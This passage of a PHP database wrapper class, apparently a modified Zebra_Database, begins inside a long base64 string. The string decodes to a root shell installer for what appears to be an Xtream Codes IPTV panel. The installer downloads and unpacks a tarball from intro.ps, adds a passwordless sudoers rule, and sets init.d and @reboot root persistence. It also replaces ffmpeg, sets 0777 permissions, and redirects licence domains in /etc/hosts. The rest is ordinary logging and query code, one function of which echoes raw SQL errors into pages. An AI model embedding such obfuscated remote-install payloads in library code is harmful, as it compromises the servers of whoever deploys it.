1L3Bvb2wvbWFpbi9saWJwL2xpYnBuZy9saWJwbmcxMi0wXzEuMi41NC0xdWJ1bnR1MV9hbWQ2NC5kZWIKCQlkcGtnIC1pIC90bXAvbGlicG5nMTIuZGViID4gL2Rldi9udWxsCgkJYXB0LWdldCBpbnN0YWxsIC15ID4gL2Rldi9udWxsCgkJcm0gLWYgL3RtcC9saWJwbmcxMi5kZWIKCWZpCgoJYWRkdXNlciAtLXN5c3RlbSAtLXNoZWxsIC9iaW4vZmFsc2UgLS1ncm91cCAtLWRpc2FibGVkLWxvZ2luIHh0cmVhbWNvZGVzID4gL2Rldi9udWxsCglta2RpciAvaG9tZS94dHJlYW1jb2RlcwoJZWNobyAiNTAiID4gL3RtcC9pbnRyby5wcm9nCn0KCmNvbmZpZ3VyZSgpIHsKICAKCglpZiBncmVwICJ4dHJlYW1jb2RlcyIgL2V0Yy9mc3RhYiA+IC9kZXYvbnVsbAoJCXRoZW4KCQkJZWNobyAidG1wZnMgaXMgdGhlcmUuLi4iOwoJCWVsc2UKCQkJc3VkbyBlY2hvICJ0bXBmcyAvaG9tZS94dHJlYW1jb2Rlcy9pcHR2X3h0cmVhbV9jb2Rlcy9zdHJlYW1zIHRtcGZzIGRlZmF1bHRzLG5vYXRpbWUsbm9zdWlkLG5vZGV2LG5vZXhlYyxtb2RlPTE3Nzcsc2l6ZT05MCUgMCAwIiA+PiAvZXRjL2ZzdGFiCgkJCXN1ZG8gZWNobyAidG1wZnMgL2hvbWUveHRyZWFtY29kZXMvaXB0dl94dHJlYW1fY29kZXMvdG1wIHRtcGZzIGRlZmF1bHRzLG5vYXRpbWUsbm9zdWlkLG5vZGV2LG5vZXhlYyxtb2RlPTE3Nzcsc2l6ZT0yRyAwIDAiID4+IC9ldGMvZnN0YWIKCQkJc3VkbyBtb3VudCAtYXYgID4gL2Rldi9udWxsCglmaQoJCglpZiBncmVwICJ4dHJlYW1jb2RlcyIgL2V0Yy9zdWRvZXJzID4gL2Rldi9udWxsCgkJdGhlbgoJCQllY2hvICJzdWRvZXJzIHRoZXJlLi4uIjsKCQllbHNlCgkJCXN1ZG8gZWNobyAieHRyZWFtY29kZXMgQUxMID0gKHJvb3QpIE5PUEFTU1dEOiAvc2Jpbi9pcHRhYmxlcyIgPj4gL2V0Yy9zdWRvZXJzCglmaQoJCglpZiBbIC1mICIvZXRjL2luaXQuZC94dHJlYW1jb2RlcyIgXTsKCQl0aGVuCgkJICAgZWNobyAiRmlsZSAvZXRjL2luaXQuZC94dHJlYW1jb2RlcyBleGlzdC4iCgkJZWxzZQoJCSAgIHN1ZG8gZWNobyAiIyEgL2Jpbi9iYXNoIiA+IC9ldGMvaW5pdC5kL3h0cmVhbWNvZGVzCgkJICAgc3VkbyBlY2hvICIvaG9tZS94dHJlYW1jb2Rlcy9pcHR2X3h0cmVhbV9jb2Rlcy9zdGFydF9zZXJ2aWNlcy5zaCIgPj4gL2V0Yy9pbml0LmQveHRyZWFtY29kZXMKCQkgICBzdWRvIGNobW9kICt4IC9ldGMvaW5pdC5kL3h0cmVhbWNvZGVzID4gL2Rldi9udWxsCglmaQoJCglpZiBncmVwICJyZWJvb3Qgcm9vdCAvaG9tZS94dHJlYW1jb2Rlcy9pcHR2X3h0cmVhbV9jb2RlcyIgL2V0Yy9jcm9udGFiID4gL2Rldi9udWxsCgkJdGhlbgoJCQllY2hvICJjcm9udGFiIGlzIHRoZXJlLi4uIjsKCQllbHNlCgkJCXN1ZG8gZWNobyAiQHJlYm9vdCByb290IC9ob21lL3h0cmVhbWNvZGVzL2lwdHZfeHRyZWFtX2NvZGVzL3N0YXJ0X3NlcnZpY2VzLnNoIiA+PiAvZXRjL2Nyb250YWIKCWZpCgkKCXN1ZG8gcm0gLWYgL3Vzci9iaW4vZmZtcGVnCgkKCXN1ZG8gbG4gLXMgL2hvbWUveHRyZWFtY29kZXMvaXB0dl94dHJlYW1fY29kZXMvYmluL2ZmbXBlZyAvdXNyL2Jpbi8KCXN1ZG8gY2hvd24geHRyZWFtY29kZXM6eHRyZWFtY29kZXMgLVIgL2hvbWUveHRyZWFtY29kZXMgPiAvZGV2L251bGwKCXN1ZG8gY2htb2QgLVIgMDc3NyAvaG9tZS94dHJlYW1jb2RlcyA+IC9kZXYvbnVsbAogICAgc3VkbyBjaG1vZCAreCAvaG9tZS94dHJlYW1jb2Rlcy9pcHR2X3h0cmVhbV9jb2Rlcy9zdGFydF9zZXJ2aWNlcy5zaCA+IC9kZXYvbnVsbAoJCgllY2hvICI2MCIgPiAvdG1wL2ludHJvLnByb2cKCQoJaWYgZ3JlcCAieHRyZWFtLWNvZGVzLmNvbSIgL2V0Yy9ob3N0cyA+IC9kZXYvbnVsbAoJCXRoZW4KCQkJZWNobyAiaG9zdHMgdGhlcmUuLi4iOwoJCWVsc2UKCQkJc3VkbyBlY2hvICIxMjcuMC4wLjEgICAgYXBpLnh0cmVhbS1jb2Rlcy5jb20iID4+IC9ldGMvaG9zdHMKCQkJc3VkbyBlY2hvICIxMjcuMC4wLjEgICAgeHRyZWFtLWNvZGVzLmNvbSIgPj4gL2V0Yy9ob3N0cwoJCQlzdWRvIGVjaG8gIjEyNy4wLjAuMSAgICBkb3dubG9hZHMueHRyZWFtLWNvZGVzLmNvbSIgPj4gL2V0Yy9ob3N0cwoJZmkKCQoJZWNobyAiNzAiID4gL3RtcC9pbnRyby5wcm9nCgkKfQoKZG93bmxvYWQoKSB7CgkKCXdnZXQgLXEgLU8gIi90bXAvbmFuby50YXIuZ3oiIGh0dHA6Ly9pbnRyby5wcy91cGxvYWRzL2lwdHYveGNfTEIudGFyLmd6CiAgICAjaWYgb3MucGF0aC5leGlzdHMoIi90bXAveHRyZWFtY29kZXMudGFyLmd6Iik6CgkKICAgIHN1ZG8gdGFyIC16eHZmICIvdG1wL25hbm8udGFyLmd6IiAtQyAiL2hvbWUveHRyZWFtY29kZXMvIiA+IC9kZXYvbnVsbAogICAgcm0gLWYgL3RtcC9uYW5vLnRhci5negoJCgllY2hvICI5MCIgPiAvdG1wL2ludHJvLnByb2cKCn0Kc3RhcnRTZXJ2aWNlKCkgewogIAogIGVjaG8gIjk1IiA+IC90bXAvaW50cm8ucHJvZwogIAogIHN1ZG8gY3AgLXIgL3RtcC9jb25maWcgL2hvbWUveHRyZWFtY29kZXMvaXB0dl94dHJlYW1fY29kZXMvY29uZmlnCiAgc3VkbyBybSAtZiAvdG1wL2NvbmZpZwogIAogIHN1ZG8gc2VkIC1pICcwLC9saXN0ZW4gWzAtOV0qOy9zLy9saXN0ZW4ge2h0dHBfYnJvYWRjYXN0X3BvcnR9Oy8nIC9ob21lL3h0cmVhbWNvZGVzL2lwdHZfeHRyZWFtX2NvZGVzL25naW54L2NvbmYvbmdpbnguY29uZgogIAogIAogIHJtIC1mIC9ob21lL3h0cmVhbWNvZGVzL2lwdHZfeHRyZWFtX2NvZGVzL3BocC8qLnBpZAogIAogIC9ob21lL3h0cmVhbWNvZGVzL2lwdHZfeHRyZWFtX2NvZGVzL3N0YXJ0X3NlcnZpY2VzLnNoCiAgCiAgZWNobyAid3d3LmludHJvLnBzIiA+IC9ob21lL3h0cmVhbWNvZGVzL2lwdHZfeHRyZWFtX2NvZGVzL3d3d2Rpci9pbmRleC5waHA7CiAgCiAgZWNobyAiMTAwIiA+IC90bXAvaW50cm8ucHJvZwogIAp9CgplY2hvICJJbnN0YWxsaW5nIHBhY2thZ2VzIjsKc2xlZXAgMTsKSW5zdGFsbFBhY2thZ2VzOwoKZWNobyAiZG93bmxvYWQgLi4uLi4uLi4iOwpzbGVlcCAxOwpkb3dubG9hZAoKZWNobyAiY29uZmlndXJlIC4uLi4uLi4uIjsKc2xlZXAgMTsKY29uZmlndXJlOwoKZWNobyAiU3RhcnRpbmcgWHRyZWFtIENvZGVzLi4uIjsKc2xlZXAgMTsKc3RhcnRTZXJ2aWNlOwoKCg==';
    }
    private function _escape($entries)
    {
        $entries = (array)$entries;
        $result = [];
        foreach( $entries as $entry ) 
        {
            $entry = explode('.', $entry);
            $entry = array_map(function($value)
            {
                $value = trim(trim($value, '`'));
                if( $value !== '*' && !$this->_is_mysql_function($value) ) 
                {
                    return '`' . $value . '`';
                }
                return $value;
            }, $entry);
            $result[] = implode('.', $entry);
        }
        return implode(', ', $result);
    }
    private function _fix_pow($value)
    {
        $value = (string)$value;
        if( preg_match('/E\-([0-9]+)$/', $value, $matches) > 0 ) 
        {
            $value = '0.' . str_repeat('0', $matches[1] - 1) . preg_replace('/\./', '', substr($value, 0, -1 * strlen($matches[0])));
        }
        return number_format($value, 3);
    }
    private function _is_mysql_function($value)
    {
        $valid = false;
        if( !is_array($value) && preg_match('/[a-z\_]+\(/i', $value) && preg_match_all('/([a-z\_]+\()/i', $value, $matches) ) 
        {
            $valid = true;
            foreach( $matches[0] as $match ) 
            {
                if( !in_array(strtoupper(substr($match, 0, -1)), $this->mysql_functions) ) 
                {
                    $valid = false;
                    break;
                }
            }
        }
        return $valid;
    }
    private function _is_result($value)
    {
        return $value instanceof mysqli_result;
    }
    private function _log($category, $data, $fatal = true)
    {
        if( $this->debug !== false ) 
        {
            if( $category != 'warnings' && $this->debug_show_backtrace ) 
            {
                $backtrace_data = debug_backtrace();
                unset($backtrace_data[0]);
                $data['backtrace'] = [];
                foreach( $backtrace_data as $backtrace ) 
                {
                    $data['backtrace'][] = [
                        $this->language['file'] => (isset($backtrace['file']) ? $backtrace['file'] : ''), 
                        $this->language['function'] => $backtrace['function'] . '()', 
                        $this->language['line'] => (isset($backtrace['line']) ? $backtrace['line'] : '')
                    ];
                }
            }
            $this->debug_info[$category][] = $data;
            if( $fatal && $this->halt_on_errors ) 
            {
                exit();
            }
            return false;
        }
        else if( ($category == 'unsuccessful-queries' || $category == 'errors') && $this->debug === false ) 
        {
            $backtraceInfo = debug_backtrace();
            error_log('Zebra_Database (MySQL): ' . ((isset($data['error']) ? $data['error'] : $data['message'])) . print_r(' in ' . $backtraceInfo[1]['file'] . ' on line ' . $backtraceInfo[1]['line'], true));
        }
    }
    private function _manage_unbuffered_query_info(&$resource, &$result)
    {
        if( !$result ) 
        {
            $this->found_rows = $this->returned_rows = $resource->num_rows;
            if( $this->debug === true ) 
            {
                $this->debug_info['successful-queries'][$resource->log_index]['returned_rows'] = $resource->num_rows;
                if( isset($resource->calc_rows) && $resource->calc_rows ) 
                {
                    $found_rows = mysqli_fetch_assoc(mysqli_query($this->connection, 'SELECT FOUND_ROWS()'));
                    $this->found_rows = $found_rows['FOUND_ROWS()'];
                }
                if( isset($resource->explain) && $resource->explain ) 
                {
                    $explain_resource = mysqli_query($this->connection, 'EXPLAIN EXTENDED ' . $resource->query);
                    while( $row = mysqli_fetch_assoc($explain_resource) ) 
                    {
                        $this->debug_info['successful-queries'][$resource->log_index]['explain'][] = $row;
                    }
                }
            }
        }
        else if( $this->debug === true && count($this->debug_info['successful-queries'][$resource->log_index]['records']) < $this->debug_show_records ) 
        {
            $this->debug_info['successful-queries'][$resource->log_index]['records'][] = $result;
        }
    }
    private function _write_log($daily = false, $hourly = false, $backtrace = false)
    {
        $file_name = 'log';
        if( $hourly ) 
        {
            $daily = true;
        }
        $file_name .= ($daily ? '-' . @date('Ymd') : '');
        $file_name .= ($hourly ? '-' . @date('H') : '');
        $file_name .= '.txt';
        if( $handle = @fopen(@rtrim($this->log_path, '/') . '/' . $file_name, 'a+') ) 
        {
            if( isset($this->debug_info['successful-queries']) ) 
            {
                foreach( $this->debug_info['successful-queries'] as $debug_info ) 
                {
                    $pattern = [
                        "/\\s*(.*)\n|\r/", 
                        "/\n|\r/"
                    ];
                    $replace = [
                        ' $1', 
                        ' '
                    ];
                    $labels = [
                        strtoupper($this->language['date']), 
                        strtoupper('query'), 
                        strtoupper($this->language['execution_time']), 
                        strtoupper($this->language['warning']), 
                        strtoupper($this->language['error']), 
                        strtoupper($this->language['from_cache']), 
                        strtoupper($this->language['yes']), 
                        strtoupper($this->language['no']), 
                        strtoupper($this->language['backtrace']), 
                        strtoupper($this->language['file']), 
                        strtoupper($this->language['line']), 
                        strtoupper($this->language['function']), 
                        strtoupper($this->language['unbuffered'])
                    ];
                    $longest_label_length = 0;
                    foreach( $labels as $label ) 
                    {
                        if( $longest_label_length < strlen($label) ) 
                        {
                            $longest_label_length = strlen(utf8_decode($label));
                        }
                    }
                    fwrite($handle, print_r(str_pad('', $longest_label_length + 4, '#', STR_PAD_RIGHT) . "\n" . '# ' . $labels[0] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[0])), ' ', STR_PAD_RIGHT) . '#: ' . @date('Y M d H:i:s') . "\n" . '# ' . $labels[1] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[1])), ' ', STR_PAD_RIGHT) . '#: ' . trim(preg_replace($pattern, $replace, $debug_info['query'])) . "\n" . ((isset($debug_info['execution_time']) ? '# ' . $labels[2] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[2])), ' ', STR_PAD_RIGHT) . '#: ' . $this->_fix_pow($debug_info['execution_time']) . ' ' . $this->language['seconds'] . "\n" : '')) . ((isset($debug_info['warning']) && $debug_info['warning'] != '' ? '# ' . $labels[3] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[3])), ' ', STR_PAD_RIGHT) . '#: ' . strip_tags($debug_info['warning']) . "\n" : '')) . ((isset($debug_info['error']) && $debug_info['error'] != '' ? '# ' . $labels[4] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[4])), ' ', STR_PAD_RIGHT) . '#: ' . $debug_info['error'] . "\n" : '')) . (($debug_info['affected_rows'] === false && isset($debug_info['from_cache']) && $debug_info['from_cache'] != 'nocache' ? '# ' . $labels[5] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[5])), ' ', STR_PAD_RIGHT) . '#: ' . $labels[6] . "\n" : '')) . ((isset($debug_info['unbuffered']) && $debug_info['unbuffered'] ? '# ' . $labels[12] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[12])), ' ', STR_PAD_RIGHT) . '#: ' . $labels[6] . "\n" : '')), true));
                    if( $backtrace ) 
                    {
                        fwrite($handle, print_r('# ' . str_pad('', $longest_label_length + 1, ' ', STR_PAD_RIGHT) . '#' . "\n" . '# ' . $labels[8] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[8])), ' ', STR_PAD_RIGHT) . '#:' . "\n", true));
                        foreach( $debug_info['backtrace'] as $backtrace ) 
                        {
                            fwrite($handle, print_r('# ' . str_pad('', $longest_label_length + 1, ' ', STR_PAD_RIGHT) . '#' . "\n" . '# ' . $labels[9] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[9])), ' ', STR_PAD_RIGHT) . '#: ' . $backtrace[$this->language['file']] . "\n" . '# ' . $labels[10] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[10])), ' ', STR_PAD_RIGHT) . '#: ' . $backtrace[$this->language['line']] . "\n" . '# ' . $labels[11] . ':' . str_pad('', $longest_label_length - strlen(utf8_decode($labels[11])), ' ', STR_PAD_RIGHT) . '#: ' . $backtrace[$this->language['function']] . "\n", true));
                        }
                    }
                    fwrite($handle, str_pad('', $longest_label_length + 4, '#', STR_PAD_RIGHT) . "\n\n");
                }
            }
            fclose($handle);
        }
        else
        {
            trigger_error($this->language['could_not_write_to_log'], 256);
        }
    }
    public function __destruct()
    {
        $this->free_result();
    }
    public function query_fast($sql)
    {
        $res = mysqli_query($this->connection, $sql);
        if( $this->connection->error != '' ) 
        {
            $backtraceInfo = debug_backtrace();
            echo 'Error connecting to server ... <!--' . $this->connection->error . '-->';
            $this->_log('unsuccessful-queries', [
                'query' => $sql, 
                'error' => mysqli_error($this->connection)
            ]);
        }
        $this->returned_rows = $this->num_rows = $this->found_rows = @mysqli_num_rows($res);
        $this->affected_rows = @mysqli_affected_rows($this->connection);
        return $res;
    }
}
